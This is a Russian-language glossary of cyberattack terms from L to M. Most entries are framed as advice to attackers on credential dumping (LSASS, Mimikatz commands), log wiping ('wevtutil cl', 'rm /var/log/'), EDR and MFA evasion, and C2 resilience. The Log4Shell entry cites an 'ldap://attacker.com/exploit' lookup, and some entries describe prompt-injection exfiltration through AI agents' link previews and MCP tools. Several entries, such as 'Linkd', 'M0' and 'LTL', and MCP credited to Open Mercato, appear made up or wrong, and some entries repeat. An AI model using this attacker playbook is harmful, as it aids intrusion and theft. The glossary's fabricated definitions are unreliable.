Lightweight Directory Access Protocol (LDAP) Протокол доступа к службам каталогов (Lightweight Directory Access Protocol). LDAP используется в Active Directory (AD), OpenLDAP, для аутентификации, поиска пользователей и групп, изменения атрибутов. LDAP работает на порту 389 (TCP/UDP), LDAPS 636. Атаки на LDAP: LDAP injection, анонимный доступ (если не настроена аутентификация), DCSync (через LDAP), кража данных (список пользователей, групп).

LIME (Linux Memory Extractor) Инструмент для дампа памяти Linux (Live Memory Extraction). Используется для анализа инцидентов (forensics). Для атакующего LIME угроза: если защитники сделают дамп памяти, они могут извлечь ключи, пароли, содержимое процессов.

Limewire Платформа для обмена файлами, возрожденная как сервис для публикации доказательств взлома (proof samples). ShinyHunters выкладывал на Limewire образцы украденных данных, чтобы подтвердить серьезность угрозы жертвам. В 2026 Limewire инструмент extortion.

Link (Symlink) Символическая ссылка (symlink). В атаках symlink используется для: обхода ограничений (если приложение следует symlink, можно получить доступ к файлам за пределами разрешенной директории), повышения привилегий (если можно создать symlink в системной директории), persistence.

Link Preview Автоматическое превью ссылок в мессенджерах (Telegram, Slack, Discord, Teams). При отправке ссылки, платформа автоматически делает GET-запрос для получения заголовка, описания, картинки. Zero-click auto-preview exploitation использует эту функцию: AI-агент генерирует URL с украденными данными, платформа автоматически делает GET-запрос, и данные уходят атакующему. PromptArmor обнаружил эту уязвимость в OpenClaw и других AI-агентах.

Linkd (Active Directory) Утилита для управления ссылками в Active Directory. Может быть использована для маппинга связей, поиска путей атаки. BloodHound заменяет более продвинуто.

Linux Операционная система с открытым исходным кодом, широко используемая на серверах, IoT, облачных платформах. Атаки на Linux: LPE (Dirty COW, CVE-2021-3156), RCE на веб-сервисах (Apache, nginx), кража SSH-ключей, криптомайнинг, атаки на контейнеры (Docker breakouts). Linux имеет свою экосистему инструментов (Metasploit, Cobalt Strike для Linux).

Linux Kernel Ядро Linux. Уязвимости ядра (Dirty COW, CVE-2021-3490) дают LPE до root. Kernel exploit для Linux часто используется для эскалации после получения пользовательского доступа.

List (C2) Список C2-серверов в агенте (hardcoded, DGA, через DNS). Агент перебирает список, пока не найдет активный C2. Для resilience список должен быть большим и обновляться.

LLM (Large Language Model) Большая языковая модель (GPT, Claude, Gemini). В контексте атак LLM используется для: генерации фишинговых писем (без ошибок), написания кода малвари (Slopoly), deepfake vishing (генерация голоса), обхода guardrails (prompt injection), автоматизации OSINT. LLM инструмент для масштабирования атак. Slopoly первый AI-сгенерированный C2.

LLMNR (Link-Local Multicast Name Resolution) Протокол Windows для разрешения имен в локальной сети, когда DNS недоступен. LLMNR уязвим к spoofing: атакующий в локальной сети может ответить на LLMNR-запрос, выдавая себя за легитимный хост, и перехватить NTLM-хэш (responder). LLMNR рекомендуется отключать.

LM (LAN Manager) См. LAN Manager.

LM-Hash Хэш пароля в протоколе LAN Manager. LM-хэш разбивает пароль на 7-символьные блоки, заполняя недостающие символы, и не чувствителен к регистру. LM-хэш взламывается за секунды. В современных Windows отключен, но может быть включен для совместимости с legacy-системами.

LN (Link) Жесткая ссылка в Unix/Linux. В атаках жесткие ссылки могут использоваться для: обхода ограничений (если файл удален, но есть жесткая ссылка, данные остаются), persistence.

Load Balancing Балансировка нагрузки. Для атакующего load balancer препятствие: распределяет трафик между несколькими серверами, что может сбивать с толку при разведке. Также может скрывать реальный IP backend-сервера. В DDoS-атаках load balancer может быть целью.

LoadLibrary Функция Windows для загрузки DLL. Используется в DLL injection: CreateRemoteThread с адресом LoadLibrary для загрузки вредоносной DLL в удаленный процесс. Для EDR вызов LoadLibrary в удаленном процессе сигнатура.

Local Admin Локальный администратор на компьютере (локальная группа Administrators). Для атакующего наличие Local Admin на компьютере позволяет: устанавливать ПО, изменять настройки, выключать антивирус, дампить LSASS. Lateral movement часто требует Local Admin на целевых системах.

Local Privilege Escalation (LPE) Повышение привилегий на локальной системе: от обычного пользователя до SYSTEM (Windows) или root (Linux). LPE достигается через: kernel exploits, misconfigured services (AlwaysInstallElevated), уязвимости в драйверах (BYOVD), credential theft (LSASS). LPE стандартный этап после initial access.

LockBit RaaS-группа (LockBit 3.0, LockBit Black), одна из самых активных до takedown в 2024. LockBit использовал модель affiliate, шифровал Windows, Linux, ESXi. В 2026 LockBit считается disrupted, но его техники используются другими группами.

Lockdown Mode (iOS) Режим защиты в iOS, блокирующий многие функции (фишинговые ссылки, инъекции) для защиты от целевых атак (Pegasus). Lockdown Mode препятствие для атакующих, пытающихся эксплуатировать iOS через 0-click.

Log Aggregation Агрегация логов (SIEM, Splunk, Sentinel). Атакующий должен либо чистить логи до того, как они попадут в SIEM, либо действовать так, чтобы не создавать событий, которые агрегируются.

Log Analysis Анализ логов для обнаружения атак. Для атакующего log analysis угроза: если оставить следы в логах (Windows Event Log, syslog, CloudTrail), защитники могут обнаружить атаку. Поэтому атакующий чистит логи (wevtutil cl, rm /var/log/), отключает логирование (ETW unhooking), или использует методы, не создающие логов (memory-only).

Log Injection Внедрение в логи ложных записей для: сокрытия реальных действий (заполнение логов мусором), эксплуатации уязвимостей (log injection может привести к command injection, если логи обрабатываются скриптами), обмана аналитиков.

Log4j Библиотека логирования для Java. Log4Shell (CVE-2021-44228) критическая уязвимость, позволяющая RCE через JNDI injection. В 2026 Log4j все еще используется в старых системах, не обновленных после Log4Shell. Для атакующего Log4j вектор initial access.

Log4Shell Уязвимость в Log4j, позволяющая выполнить произвольный код (RCE) через JNDI lookup (ldap://attacker.com/exploit). Атакованы миллионы серверов. В 2026 Log4Shell все еще эксплуатируется в непропатченных системах.

Logging Логирование. Для атакующего logging враг: нужно минимизировать логи, отключать аудит, чистить следы. Interlock использовал агрессивное удаление логов через HAProxy cron jobs.

Logic Bomb Вредоносный код, активирующийся при определенном условии (дата, событие, отсутствие сигнала). Logic bomb может быть установлен инсайдером (сотрудником) для саботажа. В контексте APT logic bomb может быть used for destructive operations.

LOLBins (Living Off the Land Binaries) Легитимные бинарники Windows, которые могут быть использованы для вредоносных целей: powershell.exe, cmd.exe, wmic.exe, rundll32.exe, regsvr32.exe, mshta.exe, certutil.exe, bitsadmin.exe. LOLBins используются для: скачивания малвари (certutil), выполнения кода (mshta), persistence (schtasks), отключения защиты (sc stop). Использование LOLBins обходит AppLocker и EDR, так как процессы легитимны.

LOLDrivers (Living Off the Land Drivers) Легитимные драйверы Windows, которые могут быть использованы для вредоносных целей, особенно для BYOVD (Bring Your Own Vulnerable Driver). Уязвимые драйверы (от ASUS, MSI, Gigabyte) подписаны, загружаются без предупреждений, и могут быть использованы для отключения EDR или получения kernel access.

LOLScripts Легитимные скрипты (VBS, JS, PS1), которые могут быть использованы для вредоносных целей, аналогично LOLBins.

Long Polling Техника в веб-приложениях, когда сервер удерживает соединение открытым до тех пор, пока не будет данных для отправки. Используется в C2 для уменьшения heartbeat-трафика: агент открывает long poll и ждет команд.

Loopback Интерфейс обратной связи (127.0.0.1). Loopback используется для: тестирования, обхода сетевых фильтров (трафик не выходит за пределы хоста). В атаках loopback может быть использован для связи между процессами без сетевого взаимодействия.

LOP (Low and Slow) Техника эксфильтрации данных и атак, при которой действия растягиваются во времени, чтобы не вызывать детектов. Вместо скачивания 50TB за час, атакующий вывозит данные частями по 100GB в день, в рабочие часы, с IP, похожими на легитимные. Handala, вероятно, использовала low & slow для эксфильтрации 50TB из Stryker.

LPE (Local Privilege Escalation) Локальное повышение привилегий (Local Privilege Escalation) переход от непривилегированного пользователя к SYSTEM (Windows) или root (Linux). LPE стандартный этап после initial access. Методы: kernel exploits (Dirty COW, CVE-2021-3156), misconfigured services (AlwaysInstallElevated, unquoted service paths), credential theft (LSASS dump), BYOVD (Bring Your Own Vulnerable Driver), уязвимости в драйверах, misconfigured sudo (Linux).

LSA (Local Security Authority) Компонент Windows, включающий LSASS. LSA Secrets раздел реестра, где хранятся пароли служб, учетных данных авто-логина, ключи. Дамп LSA Secrets (через reg, Mimikatz) дает пароли служб (которые часто имеют высокие привилегии).

LSA Secrets Хранилище секретов в реестре Windows (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets). Содержит: пароли служб, учетные данные для авто-логина, ключи. Дамп LSA Secrets дает атакующему пароли, которые могут быть использованы для lateral movement.

LSASS (Local Security Authority Subsystem Service) Процесс Windows, отвечающий за аутентификацию (логин, пароли, Kerberos). LSASS хранит в памяти пароли (в открытом виде, если включен Wdigest) и хэши (NTLM, Kerberos). Дамп LSASS (через Mimikatz, ProcDump) один из основных способов кражи учетных данных. Для защиты LSASS используется PPL (Protected Process Light), который блокирует открытие процесса для чтения. Обход PPL через kernel exploit или BYOVD.

LTL (Long Tail Latency) Техника обхода поведенческого анализа: имитация долгих задержек, характерных для человека (паузы между командами, медленное чтение файлов). AI-детекты, обученные на быстрых действиях (обычно автоматизированных), могут пропустить медленные действия.

LTS (Long Term Support) Долгосрочная поддержка (Ubuntu LTS, Windows Server LTSC). LTS-версии получают обновления безопасности дольше, но атакующие знают, что многие организации используют LTS и могут не обновляться между LTS-релизами, оставляя окна.

LUA (Least Privilege) Принцип наименьших привилегий. LUA используется в контейнерах, облачных средах, приложениях. Нарушение LUA over-privileged accounts цель атакующих.

LUKS (Linux Unified Key Setup) Стандарт шифрования дисков для Linux (аналог BitLocker). LUKS использует ключ, защищенный паролем. Для атакующего LUKS препятствие, если система выключена; если включена, ключ в памяти и может быть извлечен (cold boot attack, memory dump).

LummaC2 Инфостилер, популярный в 2026. LummaC2 крадет пароли, cookies, крипто-кошельки, файлы, делает скриншоты, кейлог. Распространяется через malvertising, crack-сайты, фишинг. LummaC2 имеет панель управления (C2) с возможностью загрузки дополнительных модулей. Конкурирует с RedLine, Stealc.

LVM (Logical Volume Manager) Управление логическими томами в Linux. LVM используется для гибкого управления дисками. В атаках LVM может быть целью: уничтожение томов, уменьшение размера, шифрование.

LXC (Linux Containers) Контейнеры Linux, альтернатива Docker. LXC цель для container breakout.

M

M0 (M-Zero) Нулевой уровень в модели безопасности (аппаратный уровень). В контексте атак m0 уровень, на котором работают firmware-бэкдоры (BIOS/UEFI, BMC). Компрометация m0 дает persistence, который не может быть удален переустановкой ОС.

M1 (M-One) Процессор Apple Silicon. M1, M2, M3 чипы имеют встроенные механизмы безопасности (Secure Enclave, SEP). Для атакующего M1 препятствие: взлом Secure Enclave требует физического доступа и сложного оборудования. Однако уязвимости в macOS на M1 могут существовать на уровне ОС.

MaaS (Malware as a Service) Малварь как услуга: подписка на инфостилеры (LummaC2, RedLine), RAT, криптомайнеры с панелью управления. MaaS снижает барьер входа: покупатель платит ежемесячно и получает доступ к C2, панели, обновлениям. В 2026 MaaS часть CaaS (Crime-as-a-Service).

MAC (Mandatory Access Control) Мандатный контроль доступа (SELinux, AppArmor). MAC ограничивает, что процессы могут делать, даже если они работают от root. Для атакующего MAC препятствие: даже получив root, нельзя выполнить некоторые действия (например, отключить SELinux). Обход MAC требует знания политик и, возможно, перезагрузки с параметрами ядра.

MAC (Media Access Control) MAC-адрес (физический адрес сетевого интерфейса). MAC-адрес может быть использован для: идентификации устройства (fingerprinting), отслеживания (Wi-Fi трекинг), обхода ограничений (смена MAC-адреса). В атаках на локальные сети MAC-адрес используется в ARP poisoning, MAC flooding.

Macro (Office) Макросы в Microsoft Office (VBA Visual Basic for Applications). Макросы классический вектор доставки малвари. Жертва открывает документ (Word, Excel), включается макрос (или убеждают включить), макрос скачивает и запускает малварь. В 2026 макросы по умолчанию отключены, но атакующие используют социальную инженерию для их включения, или используют другие векторы (ClickFix, HTML smuggling).

MacSync Инфостилер для macOS, распространяемый через fake AI tools и ClickFix. MacSync крадет пароли из Keychain, cookies, крипто-кошельки, файлы. Появился в 2026 как эволюция macOS-малвари (ранее была ограничена). Распространяется через фейковые обновления, "cracked software" для Mac.

MAG (Magnetic Stripe) Магнитная полоса на кредитных картах. Скимминг (кража данных с магнитной полосы) используется в carding. В 2026 карты с чипом (EMV) более защищены, но магнитная полоса все еще используется в США.

Magento Платформа для интернет-магазинов (Adobe Commerce). Уязвимости Magento (SQL injection, RCE, API misconfig) приводят к утечкам данных клиентов (имена, адреса, кредитные карты). ShinyHunters могла бы атаковать Magento, но выбрала Salesforce.

Magic Link Ссылка для аутентификации (без пароля), отправляемая на email. Magic link используется для входа без пароля. Для атакующего перехват magic link (через доступ к почте) дает доступ к аккаунту. Атака на email (compromised mailbox) способ обойти MFA.

Malleable C2 Механизм кастомизации Cobalt Strike: профиль, определяющий, как выглядит C2-трафик (заголовки, User-Agent, URL-паттерны, шифрование, метаданные). Malleable C2 позволяет имитировать легитимный трафик (Google Analytics, Microsoft). Для атакующего malleable C2 основной способ обхода сетевых детектов. Профили постоянно обновляются.

Maltego Инструмент OSINT для визуализации связей между сущностями (домены, email, IP, люди). Maltego используется для: сбора информации о цели, поиска связей, построения графа атаки. Атакующие используют Maltego для рекогносцировки.

Malvertising Распространение малвари через легитимные рекламные сети (Google Ads, Bing Ads). Рекламодатель (злоумышленник) размещает рекламу, которая ведет на фейковый сайт (fake update) или содержит вредоносный код (drive-by download). Malvertising используется для распространения инфостилеров (RedLine, LummaC2). Жертва кликает на рекламу "Adobe Flash Update", скачивает малварь.

Malware Вредоносное ПО (malicious software): программы, предназначенные для нанесения ущерба, кражи данных, получения контроля. Классификация: infostealer, ransomware, RAT, worm, trojan, rootkit, bootkit, wiper, backdoor. В 2026 малварь часто использует комбинацию техник (например, инфостилер + криптомайнер).

Malware Analysis Анализ малвари: статический (reverse engineering) и динамический (запуск в sandbox). Для атакующего malware analysis угроза: если малварь попадает в sandbox, ее поведение становится известным, хэши добавляются в антивирусы. Для обхода используются анти-сэндбокс техники (проверка на виртуализацию, задержки).

Malware Sandbox Изолированная среда для запуска малвари (Cape, Cuckoo). Sandbox записывает системные вызовы, сетевые соединения, изменения в файловой системе. Для атакующего sandbox угроза: нужно уметь детектировать sandbox (по имени процессов, MAC-адресам, наличию мыши) и менять поведение.

Man-in-the-Disk Атака на Android, при которой злоумышленник получает доступ к внешнему хранилищу (SD card, shared storage) и модифицирует файлы приложения до того, как приложение их прочитает. Используется для компрометации приложений, которые хранят чувствительные данные во внешнем хранилище.

Man-in-the-Middle (MITM) Атака "человек посередине": злоумышленник встраивается между двумя сторонами, перехватывая и модифицируя трафик. Методы: ARP poisoning, DNS spoofing, BGP hijacking, Evil Twin (поддельная Wi-Fi точка). MITM используется для: кражи паролей, сессий, модификации данных, инъекции малвари. AiTM (Adversary-in-the-Middle) вариант MITM для обхода MFA.

Mandiant Компания по кибербезопасности (приобретена Google). Mandiant известна расследованиями APT-групп (APT1, APT28) и выпуском инструментов (Aura Inspector для Salesforce). ShinyHunters модифицировал Aura Inspector для эксфильтрации данных.

Manticore Символический исполнитель (symbolic execution) для анализа уязвимостей. Manticore используется для поиска багов в бинарных файлах и смарт-контрактах. Для атакующего Manticore инструмент для поиска 0-day.

Map (Network) Карта сети. Атакующий строит карту сети после initial access: определяет IP-адреса, открытые порты, сервисы, ОС, отношения доверия. Инструменты: nmap, BloodHound, custom scripts.

MAS (Mobile Application Security) Безопасность мобильных приложений. В атаках на мобильные приложения используются: реверс-инжиниринг (apktool, Hopper), взлом API, кража ключей из хранилищ.

Mashup Комбинация данных из разных источников. В OSINT mashup используется для обогащения информации (например, соединение утечки Conduent с утечкой Wynn для создания полного профиля). Для атакующего mashup способ создания synthetic identity.

Mass Assignment Уязвимость веб-приложений, когда приложение автоматически присваивает значения из запроса (JSON, form) полям объекта, включая поля, которые не должны быть доступны пользователю (например, is_admin=true). Mass assignment используется для повышения привилегий.

Massive Breach Массовая утечка данных (Conduent 25M+, CarGurus 12.4M, Wynn 800k). Massive breach используется для: identity theft, credential stuffing, extortion. Для атакующего massive breach результат успешной операции, требующей масштабирования.

Mastodon Децентрализованная социальная сеть. Mastodon используется для: коммуникации в обход блокировок, публикации утекших данных, OSINT. Атакующие могут создавать аккаунты для фишинга.

MAT (Metadata Analysis Tool) Инструмент для анализа метаданных (EXIF). В OSINT MAT используется для извлечения геолокации, даты, модели устройства из фотографий. Для атакующего очистка метаданных перед публикацией часть OPSEC.

Maven Инструмент сборки Java. Supply chain атаки через Maven Central: публикация вредоносных библиотек (dependency confusion). Разработчики, использующие Maven, могут случайно загрузить вредоносную библиотеку.

MBR (Master Boot Record) Главная загрузочная запись. MBR используется в legacy-загрузке (BIOS). Bootkit может заражать MBR, выполняясь до загрузки ОС. В 2026 UEFI заменяет MBR, но legacy-системы все еще существуют.

MBSA (Microsoft Baseline Security Analyzer) Инструмент для сканирования уязвимостей Windows. Для атакующего MBSA инструмент для поиска слабых мест в целевой сети (если есть доступ).

MCP (Model Context Protocol) Протокол для AI-агентов (Open Mercato), позволяющий им взаимодействовать с инструментами. AILM (AI-Induced Lateral Movement) использует MCP: промпт-инъекция в данные, которые читает AI-агент, заставляет его выполнить команды через MCP.

MCS (Minecraft Server) В контексте атак Minecraft серверы использовались для C2 (игровой трафик выглядит легитимно). В 2026 редко.

MD5 Хэш-функция (128 бит). MD5 скомпрометирован (коллизии возможны), но все еще используется в legacy-системах. Для атакующего коллизии MD5 могут быть использованы для подделки цифровых подписей, сертификатов.

MDM (Mobile Device Management) Управление мобильными устройствами (Microsoft Intune, Jamf, VMware Workspace ONE). MDM используется для централизованного управления устройствами (Windows, iOS, Android, macOS). MDM abuse использование легитимных MDM-функций для вредоносных целей: массовое стирание устройств (wipe), развертывание скриптов, отключение защит. Handala использовала Intune (MDM) для уничтожения 200k устройств Stryker.

MDM Abuse Злоупотребление платформами управления устройствами (MDM) для destructive операций. Компрометация Global Administrator аккаунта в Intune массовая команда factory reset на все управляемые устройства. MDM abuse не требует малвари (weapon is the management console), не оставляет сигнатур. Handala пример MDM abuse.

MDR (Managed Detection and Response) Услуга по управляемому обнаружению и реагированию. MDR-провайдер (CrowdStrike, SentinelOne, Mandiant) управляет EDR/SIEM для организации. Для атакующего MDR означает, что за логами смотрят эксперты, а не только автоматика. Нужна более тщательная эвазия.

Meltdown Уязвимость процессоров Intel (2018), позволяющая читать память ядра из пользовательского режима. Meltdown патчилась микрокодом и ОС. В 2026 актуальна для непропатченных старых систем.

Meme В контексте атак мемы используются для: дезинформации, социальной инженерии, распространения ссылок на фишинг (через соцсети). Handala использовала мемы в пропаганде.

Memorandum of Understanding (MoU) Меморандум о взаимопонимании между организациями (например, CISA и ISAC). В 2026 MoU используются для обмена информацией об угрозах.

Memory Dump См. Dump (Memory). Дамп памяти (memory dump) копия оперативной памяти (RAM) процесса или всей системы. Дамп памяти может содержать: пароли в открытом виде, ключи шифрования (BitLocker, DPAPI), содержимое процессов, сетевые соединения. Для атакующего дамп памяти источник ценной информации. Инструменты: ProcDump, Dumpert, коммерческие инструменты (FTK Imager). Для защиты от дампа памяти используются: защита LSASS (PPL), шифрование памяти, детекты на чтение памяти.

Memory Forensics Анализ дампов памяти (Volatility, Rekall). Memory forensics может извлечь: пароли (LSASS), ключи шифрования, активные сетевые соединения, запущенные процессы, внедренные DLL. Для атакующего memory forensics угроза: нужно минимизировать следы в памяти (шифрование данных, короткое время жизни).

Memory Injection Внедрение кода в память процесса. Используется для: сокрытия активности (код выполняется в легитимном процессе), обхода файловых антивирусов (нет файла на диске). Методы: reflective DLL injection, process hollowing, APC injection.

Memory Scraper Инструмент для извлечения данных из памяти (паролей из LSASS, ключей из процессов). Memory scraper часть Mimikatz, инфостилеров. Используется для кражи кредов из памяти, где они могут быть в открытом виде.

Memory-only Payload Полезная нагрузка, которая существует только в оперативной памяти, не записывается на диск. Memory-only payload загружается через PowerShell (Invoke-Expression), process injection, или уязвимости. Используется для обхода антивирусов и forensics. Slopoly (AI-генерированный C2) был memory-only.

Mercato (Open Mercato) AI-first CRM/ERP фреймворк, использующий AI-агентов (MCP). Open Mercato уязвим к AILM: промпт-инъекции в поля заказов могут заставить AI-агента выполнять вредоносные действия (перевод средств). Пример из отчета Orca.

Mesh Network Ячеистая сеть (Mesh). В ботнетах mesh network (peer-to-peer) используется для C2 без центрального сервера. Каждый зараженный узел может ретранслировать команды. P2P botnets (например, Storm) устойчивее к takedown.

Metadata Данные о данных: в файлах (EXIF дата, GPS, модель камеры), в письмах (From, To, Subject), в документах (автор, компания). Для атакующего metadata источник информации для OSINT и источник улик (если не очищено). Перед публикацией данных (leak) нужно чистить metadata.

Metasploit Фреймворк для разработки и выполнения эксплойтов. Metasploit содержит сотни модулей: exploitation, payload, post-exploitation, auxiliary (сканирование). Используется пентестерами и атакующими. Metasploit активно детектится EDR, поэтому атакующие используют его модифицированные версии или кастомные эксплойты.

Metasploit Framework (MSF) Metasploit Framework фреймворк с открытым кодом для разработки и выполнения эксплойтов. Metasploit содержит сотни модулей: exploitation (эксплойты), payload (полезная нагрузка), post-exploitation (действия после взлома), auxiliary (сканирование, брутфорс). Используется пентестерами и атакующими. Metasploit активно детектится EDR, поэтому атакующие используют его модифицированные версии или кастомные эксплойты.

Metasploit Payload Полезная нагрузка в Metasploit (reverse shell, meterpreter). Payload может быть: stager (небольшой, загружает основной payload), stage (основной), inline (один файл). Meterpreter продвинутый payload с множеством функций (дамп паролей, загрузка модулей, управление сессиями).

Meterpreter Продвинутый payload Metasploit, работающий in-memory, с поддержкой шифрования, расширений (kiwi для Mimikatz), post-exploitation модулей. Meterpreter позволяет: дамп LSASS, кража хэшей, управление процессами, удаленное управление.

MFA (Multi-Factor Authentication) Многофакторная аутентификация: два или более фактора (знание пароль, владение токен/телефон, биометрия). MFA значительно усложняет атаки, но обходится через: vishing (звонок в helpdesk с просьбой сбросить MFA), AiTM (перехват сессии), SIM-swapping (перенос номера), session hijacking (кража cookies). The Com специализируется на обходе MFA через helpdesk.

MFA Bypass Обход многофакторной аутентификации. Методы: vishing (звонок в helpdesk, убедить сбросить MFA), AiTM (Adversary-in-the-Middle), SIM-swapping (перенос номера на SIM атакующего), session hijacking (кража cookies уже аутентифицированной сессии), эксплуатация уязвимостей (MFA fatigue). The Com использует vishing как основной метод.

MFA Fatigue Атака "утомление MFA": злоумышленник многократно отправляет запросы на подтверждение входа (push-уведомления), пока жертва не нажмет "Accept" от усталости или ошибки. Используется против MFA на основе push (Microsoft Authenticator, Duo). В 2026 менее эффективна, чем vishing, но все еще работает.

MFT (Master File Table) Таблица в NTFS, содержащая информацию о файлах (имена, размеры, расположение). Атаки на MFT: удаление записей для сокрытия файлов, восстановление удаленных файлов.

MFT (Microsoft Forensic Toolkit) Инструменты Microsoft для криминалистики.

MHTML Формат веб-архивов (.mht). MHTML может содержать вредоносный JavaScript. Используется в фишинге.

Microcode Микрокод процессора, обновляемый через прошивку (BIOS/UEFI). Уязвимости микрокода (Meltdown, Spectre) патчатся микрокодом. Для атакующего микрокод цель для firmware persistence (редко).

Microsoft Defender Встроенный антивирус Windows (Defender AV) и EDR (Microsoft Defender for Endpoint). Defender один из самых распространенных антивирусов. Для атакующего Defender требует: AMSI bypass, ETW unhooking, direct syscalls, отключение через реестр, или использование LOLBins, которые Defender не блокирует.

Microsoft Defender for Endpoint (MDE) EDR-компонент Microsoft Defender, собирающий телеметрию, поведенческий анализ. MDE интегрирован с Sentinel (SIEM). Для атакующего MDE серьезный противник, но его можно обходить через direct syscalls и memory-only payloads.

Microsoft Entra ID Новое название Azure AD (Azure Active Directory). Entra ID identity-провайдер Microsoft. Компрометация Entra ID дает доступ ко всем M365-приложениям. Handala использовала компрометацию Entra ID (Global Admin) для доступа к Intune.

Microsoft Graph API для доступа к данным M365 (пользователи, почта, файлы, Teams). Graph API используется для: эксфильтрации данных (чтение почты, OneDrive), автоматизации (создание пользователей), атак на OAuth. Для атакующего Graph API инструмент после компрометации Entra ID.

Microsoft Intune См. Intune. Microsoft Intune платформа управления мобильными устройствами (MDM) и приложениями. Intune позволяет централизованно управлять Windows, iOS, Android, macOS устройствами: устанавливать приложения, настраивать политики безопасности, удаленно стирать данные (wipe). Handala использовала Intune для destructive атаки на Stryker: скомпрометировав Global Admin аккаунт, они отправили массовую команду factory reset на 200,000 устройств, уничтожив их без использования малвари.

Microsoft Sentinel SIEM (Security Information and Event Management) от Microsoft, работающий на Azure. Sentinel собирает логи из M365, Azure, on-prem, и использует AI для обнаружения угроз. Для атакующего Sentinel угроза: нужно минимизировать логи, не создавать событий, которые попадут в правила корреляции.

Microsoft Teams Платформа для коммуникации. Teams используется для: фишинга (ссылки в чатах), vishing (звонки через Teams), AI-агентов (Copilot), AILM (промпт-инъекции в чаты). Auto-preview в Teams может быть использован для zero-click эксфильтрации.

MIME Multipurpose Internet Mail Extensions (MIME) стандарт для указания типа содержимого в email, HTTP (Content-Type). MIME-типы: text/html, application/pdf, image/png, application/x-msdownload. В фишинге MIME используется для маскировки вредоносных вложений: .exe отправляется как application/pdf, чтобы обойти фильтры. MIME spoofing подделка MIME-типа.

MIME (Multipurpose Internet Mail Extensions) Стандарт для вложений в email. MIME-типы используются в фишинге: вредоносные вложения маскируются под безопасные типы (application/pdf вместо application/x-msdownload).

MIME Spoofing Подделка MIME-типа в email или веб-приложении. Используется для обмана фильтров (отправить .exe как application/pdf).

MIMI (Mimikatz) Mimikatz инструмент для извлечения паролей из памяти Windows, дампа хэшей, Golden Ticket, Silver Ticket, DCSync. Название "MIMI" сокращение. Mimikatz используется для: дампа LSASS (sekurlsa::logonpasswords), DCSync (lsadump::dcsync), Golden Ticket (kerberos::golden). Mimikatz активно детектируется EDR, поэтому используются кастомные версии, запуск через reflection (Invoke-Mimikatz), или альтернативы.

Mimikatz Инструмент для извлечения паролей из памяти Windows, дампа хэшей, Golden Ticket, Silver Ticket, DCSync. Mimikatz стандарт post-exploitation. Используется для: дампа LSASS (sekurlsa::logonpasswords), DCSync (lsadump::dcsync), Golden Ticket (kerberos::golden). Mimikatz активно детектится EDR, поэтому используются кастомные версии, запуск через reflection (Invoke-Mimikatz), или альтернативы.

Minidump Небольшой дамп памяти (Windows), содержащий информацию о процессе. Minidump может быть использован для извлечения паролей из LSASS (ProcDump, dumpert). В отличие от полного дампа, minidump быстрее и меньше.

Minority Report В контексте атак "pre-crime" предиктивная аналитика AI для обнаружения атак до их совершения. Для атакующего AI-детекты препятствие: нужно имитировать легитимное поведение (behavioral blending).

MIPS Архитектура процессора (используется в IoT, маршрутизаторах). Атаки на MIPS-устройства: эксплуатация уязвимостей в прошивке, reverse engineering, внедрение backdoor.

Mirai Ботнет, заражающий IoT-устройства (камеры, роутеры) через default credentials. Mirai использовался для крупных DDoS-атак (2016). В 2026 Mirai-подобные ботнеты все еще активны, так как многие IoT-устройства не обновляются, и default credentials не меняются.

Mirror (Network) Зеркалирование трафика (port mirroring). Для атакующего mirror угроза: если трафик зеркалируется на IDS/IPS, его активность может быть обнаружена. Для обхода шифрование (TLS), туннели, скрытые каналы.

Misconfiguration Ошибка конфигурации. Главная дыра 2026: открытые S3-бакеты, перепривилегированные guest users в Salesforce, публично доступные C2 (FancyBear), default credentials. ShinyHunters живет на misconfig в Salesforce. Conduent потерял 25M+ записей из-за misconfig у подрядчика.

MISP (Malware Information Sharing Platform) Платформа для обмена информацией об угрозах (IoC, TTPs). MISP используется защитниками. Для атакующего MISP угроза: если его IoC попадут в MISP, они будут быстро распространены.

MITM (Man-in-the-Middle) Атака "человек посередине" (Man-in-the-Middle) злоумышленник встраивается между двумя сторонами, перехватывая и модифицируя трафик. Методы: ARP poisoning, DNS spoofing, BGP hijacking, Evil Twin (поддельная Wi-Fi точка). MITM используется для: кражи паролей, сессий, модификации данных, инъекции малвари. AiTM (Adversary-in-the-Middle) вариант MITM для обхода MFA.

MITRE ATT&CK База знаний тактик и техник кибератак. ATT&CK используется защитниками для построения детектов, атакующими для выбора техник, которые меньше всего детектятся. В 2026 ATT&CK включает техники для AI, облака, контейнеров, OT.

ML (Machine Learning) Машинное обучение. В атаках ML используется для: генерации фишинга, обхода CAPTCHA, deepfake, анализа защиты, автоматической эксплуатации (agentic AI). Slopoly AI-генерированный C2.

MMU (Memory Management Unit) Блок управления памятью. Уязвимости MMU могут привести к чтению памяти ядра из пользовательского режима (Meltdown). Для атакующего MMU цель для exploitation.

MNP (Mobile Number Portability) Переносимость мобильного номера. Используется в SIM-swapping: атакующий убеждает оператора перенести номер на свою SIM, используя социальную инженерию (личные данные жертвы, поддельные документы). Для обхода MFA через SMS SIM-swapping эффективный метод.

Modbus Промышленный протокол связи (ICS/SCADA). Modbus используется для управления PLC. Атаки на Modbus: перехват команд, модификация значений (давление, температура), DoS. Modbus не имеет аутентификации, что делает его уязвимым. В атаке на водоканал в Техасе злоумышленники использовали Modbus для изменения уровня хлора.

MODE (Windows) Режим работы Windows. В атаках MODE используется для: включения/отключения функций (Test Mode), обхода защиты (загрузка неподписанных драйверов в Test Mode).

Model Poisoning Отравление модели AI: внедрение вредоносных данных в обучающий набор, чтобы модель выдавала неверные результаты (пропускала малварь, ошибочно классифицировала). Для атакующего model poisoning способ скомпрометировать защитные системы (EDR на основе ML).

ModSecurity Web Application Firewall (WAF) с открытым кодом. ModSecurity используется для защиты веб-приложений. Для обхода атакующие используют: обфускацию payload, разделение запросов, атаки на бизнес-логику.

MOIS (Ministry of Intelligence of Iran) Министерство разведки Ирана. MOIS управляет прокси-группами (Handala, MuddyWater, Imperial Kitten) для киберопераций. В марте 2026 MOIS координировал ответную кампанию после ударов США/Израиля, включая атаку на Stryker через Intune. FBI seized домены Handala, связанные с MOIS.

Mojang Разработчик Minecraft. Аккаунты Minecraft используются в атаках для C2 (игровой трафик). В 2026 редко.

Monero (XMR) Приватная криптовалюта, используемая для выкупов и отмывания средств. Monero имеет скрытые адреса, кольцевые подписи, скрытые суммы, что делает транзакции неотслеживаемыми. В лаундеринг-цепочке Monero используется после миксера (Bitcoin Monero) или как основная валюта выкупа.

